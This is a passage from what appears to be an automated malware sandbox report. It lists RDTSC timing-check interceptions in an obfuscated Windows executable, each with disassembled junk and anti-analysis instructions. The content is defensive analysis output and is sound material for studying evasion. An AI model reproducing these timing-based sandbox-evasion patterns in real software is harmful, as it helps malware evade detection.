lodsw 0x00000066 jmp 00007F4B9132D69Eh 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jne 00007F4B9132D6A7h 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 cld 0x0000007a nop 0x0000007b jmp 00007F4B9132D6A7h 0x00000080 push eax 0x00000081 jbe 00007F4B9132D6A0h 0x00000087 pushad 0x00000088 push ebx 0x00000089 pop ebx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F91548 second address: F9154C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F8C1A8 second address: F8C1E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B9132D6A0h 0x0000000b pushad 0x0000000c jnl 00007F4B9132D696h 0x00000012 jmp 00007F4B9132D6A9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F9071D second address: F90721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F90721 second address: F90727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F90DF8 second address: F90DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F948A9 second address: F948AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F948AD second address: E0EACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F4B90BE623Fh 0x0000000c popad 0x0000000d add dword ptr [esp], 3EAE31B3h 0x00000014 push dword ptr [ebp+122D0D41h] 0x0000001a call dword ptr [ebp+122D2E7Eh] 0x00000020 pushad 0x00000021 mov dword ptr [ebp+122D346Ah], ebx 0x00000027 xor eax, eax 0x00000029 jo 00007F4B90BE622Ch 0x0000002f pushad 0x00000030 mov ecx, edi 0x00000032 mov ecx, edi 0x00000034 popad 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 sub dword ptr [ebp+122D346Ah], ebx 0x0000003f mov dword ptr [ebp+122D2998h], eax 0x00000045 sub dword ptr [ebp+122D346Ah], edx 0x0000004b mov esi, 0000003Ch 0x00000050 cld 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 mov dword ptr [ebp+122D183Ch], edi 0x0000005b lodsw 0x0000005d jmp 00007F4B90BE622Eh 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 jne 00007F4B90BE6237h 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 cld 0x00000071 nop 0x00000072 jmp 00007F4B90BE6237h 0x00000077 push eax 0x00000078 jbe 00007F4B90BE6230h 0x0000007e pushad 0x0000007f push ebx 0x00000080 pop ebx 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94998 second address: F9499D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94A1E second address: F94A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94B15 second address: F94B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4B9132D6A7h 0x0000000a popad 0x0000000b add dword ptr [esp], 2A7FDFF4h 0x00000012 mov dword ptr [ebp+122D3310h], edx 0x00000018 lea ebx, dword ptr [ebp+124597D6h] 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F4B9132D698h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov edx, esi 0x0000003a xchg eax, ebx 0x0000003b jmp 00007F4B9132D69Eh 0x00000040 push eax 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94B79 second address: F94B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6232h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F4B90BE622Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94C0A second address: F94C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94C0E second address: F94C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94C19 second address: F94CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F4B9132D696h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 js 00007F4B9132D699h 0x00000019 movsx ecx, dx 0x0000001c push 00000000h 0x0000001e or ecx, dword ptr [ebp+122D297Ch] 0x00000024 push 6978462Dh 0x00000029 pushad 0x0000002a jne 00007F4B9132D698h 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 push ecx 0x00000033 jmp 00007F4B9132D6A4h 0x00000038 pop ecx 0x00000039 popad 0x0000003a xor dword ptr [esp], 697846ADh 0x00000041 clc 0x00000042 push 00000003h 0x00000044 jg 00007F4B9132D69Ch 0x0000004a push 00000000h 0x0000004c push 00000000h 0x0000004e push esi 0x0000004f call 00007F4B9132D698h 0x00000054 pop esi 0x00000055 mov dword ptr [esp+04h], esi 0x00000059 add dword ptr [esp+04h], 00000014h 0x00000061 inc esi 0x00000062 push esi 0x00000063 ret 0x00000064 pop esi 0x00000065 ret 0x00000066 jmp 00007F4B9132D6A2h 0x0000006b push 00000003h 0x0000006d ja 00007F4B9132D697h 0x00000073 push C416B966h 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F4B9132D69Eh 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F94CC6 second address: F94D29 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B90BE6237h 0x00000008 jmp 00007F4B90BE6231h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 0416B966h 0x00000016 jmp 00007F4B90BE622Bh 0x0000001b lea ebx, dword ptr [ebp+124597E1h] 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007F4B90BE6228h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b jnl 00007F4B90BE622Ah 0x00000041 xchg eax, ebx 0x00000042 pushad 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F76429 second address: F7643A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Ch 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB1FB5 second address: FB1FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB1FC5 second address: FB1FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jne 00007F4B9132D696h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2250 second address: FB2271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jmp 00007F4B90BE622Eh 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 je 00007F4B90BE6226h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB25BD second address: FB25C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB25C7 second address: FB25CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB25CB second address: FB25CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2729 second address: FB272D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB272D second address: FB273D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4B9132D696h 0x0000000a je 00007F4B9132D696h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB273D second address: FB274C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F4B90BE6226h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB274C second address: FB2783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F4B9132D696h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F4B9132D69Bh 0x00000015 jng 00007F4B9132D69Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d jbe 00007F4B9132D696h 0x00000023 jns 00007F4B9132D696h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB28CA second address: FB28D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB28D0 second address: FB2901 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jo 00007F4B9132D69Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jbe 00007F4B9132D6B9h 0x00000018 jmp 00007F4B9132D69Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 jns 00007F4B9132D696h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2901 second address: FB2905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2D4E second address: FB2D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F4B9132D696h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2D58 second address: FB2D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2ED5 second address: FB2EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2EE0 second address: FB2EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2EE6 second address: FB2EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2EEA second address: FB2EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2EEE second address: FB2EF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB2EF4 second address: FB2F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F4B90BE6236h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAB3B9 second address: FAB3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAB3BD second address: FAB3C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAB3C7 second address: FAB3CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FAB3CD second address: FAB3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB389E second address: FB38DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4B9132D6A5h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F4B9132D69Dh 0x00000012 jmp 00007F4B9132D6A5h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB3D7B second address: FB3D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB3D81 second address: FB3D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB3D8A second address: FB3DA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6232h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB3DA0 second address: FB3DA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB96A5 second address: FB96A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FB9B62 second address: FB9B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F82165 second address: F82174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007F4B90BE6226h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CD1 second address: FC1CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F4B9132D696h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CE0 second address: FC1CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CE6 second address: FC1CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CEA second address: FC1CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CEE second address: FC1CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1CFC second address: FC1D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F4B90BE622Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1133 second address: FC1143 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4B9132D696h 0x00000008 jnc 00007F4B9132D696h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC1143 second address: FC1148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC3BA3 second address: FC3BAD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4B9132D69Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC3CBC second address: FC3CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC3F65 second address: FC3F6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC405A second address: FC4068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007F4B90BE6226h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4887 second address: FC488D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4941 second address: FC4945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4D4B second address: FC4D50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4D50 second address: FC4D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6233h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4E6E second address: FC4E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC4E73 second address: FC4E7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F83CE2 second address: F83CFB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F4B9132D69Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F4B9132D696h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F83CFB second address: F83D11 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F83D11 second address: F83D3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4B9132D6A7h 0x0000000f jmp 00007F4B9132D69Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F83D3C second address: F83D5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6237h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC699F second address: FC6A0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F4B9132D698h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov esi, ecx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F4B9132D698h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 mov si, A6D6h 0x0000004a mov si, bx 0x0000004d push 00000000h 0x0000004f mov dword ptr [ebp+124799F8h], esi 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 jp 00007F4B9132D696h 0x0000005f push eax 0x00000060 pop eax 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC73E2 second address: FC73FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6234h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC73FA second address: FC7465 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F4B9132D698h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D3870h], ebx 0x00000029 push 00000000h 0x0000002b cmc 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F4B9132D698h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Dh 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 je 00007F4B9132D697h 0x0000004e stc 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 push edi 0x00000053 jng 00007F4B9132D696h 0x00000059 pop edi 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC7465 second address: FC746A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC7CBF second address: FC7CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FC9DD7 second address: FC9DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCA800 second address: FCA860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4B9132D696h 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D2FC8h], edi 0x00000012 clc 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F4B9132D698h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f pushad 0x00000030 or dword ptr [ebp+122D2FCDh], ebx 0x00000036 or dword ptr [ebp+122D2D9Bh], ecx 0x0000003c popad 0x0000003d push 00000000h 0x0000003f movsx esi, si 0x00000042 mov dword ptr [ebp+122D3870h], edi 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jbe 00007F4B9132D69Ch 0x00000051 jg 00007F4B9132D696h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: FCC28C second address: FCC2B0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6238h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F749FC second address: F74A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F74A00 second address: F74A0C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4B90BE6226h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
